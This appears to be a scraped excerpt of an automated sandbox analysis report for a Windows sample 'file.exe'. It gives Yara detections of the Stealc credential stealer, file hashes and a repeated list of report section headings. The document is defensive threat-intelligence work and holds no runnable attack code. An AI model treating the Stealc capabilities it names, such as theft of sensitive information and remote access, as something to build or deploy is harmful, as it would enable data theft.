Source: Yara match	File source: 0.2.file.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2089126694.0000000005020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4024, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2089126694.0000000005020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4024, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

ID:	1546478
Product:	CloudBasic
Start time:	00:37:05
Start date:	01.11.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	43deae52c429449144c488c4ea074c14
SHA1:	2496e112cf08e1584a15d65409d84936f3c8b7f9
SHA256:	bd4beff45c77e1045bd78a72e0dbd8700f18d088a57ce444eb2b8a5422035bbf
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
file.exe